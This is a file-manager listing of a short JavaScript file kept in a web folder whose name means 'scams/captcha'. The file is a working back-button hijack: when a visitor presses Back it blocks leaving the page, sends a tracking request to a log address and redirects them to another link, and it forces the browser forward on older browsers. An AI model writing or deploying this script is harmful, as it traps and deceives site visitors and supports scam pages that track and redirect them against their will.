File "backlink_back_button.js"

Full path: /usr/home/mndrn/domains/mndrn.ru/public_html/скамы/капча/backlink_back_button.js
File size: 620 B
MIME-type: text/plain
Charset: utf-8

Download   Open   Back

window.onload = function () {

    if (history.pushState) {
        //Chrome and modern browsers
        history.pushState(null, document.title, location.href);
        window.addEventListener('popstate', function (event) {

            history.pushState(null, document.title, location.href);

            var xhr = new XMLHttpRequest();
            xhr.open('GET', logURL);
            xhr.onload = function() {
                console.log("Log Sent");
            };
            xhr.send();

            window.location.href = backLinkURL;
        });
    }
    else {
        //IE
        history.forward();
    }

};

PHP File Manager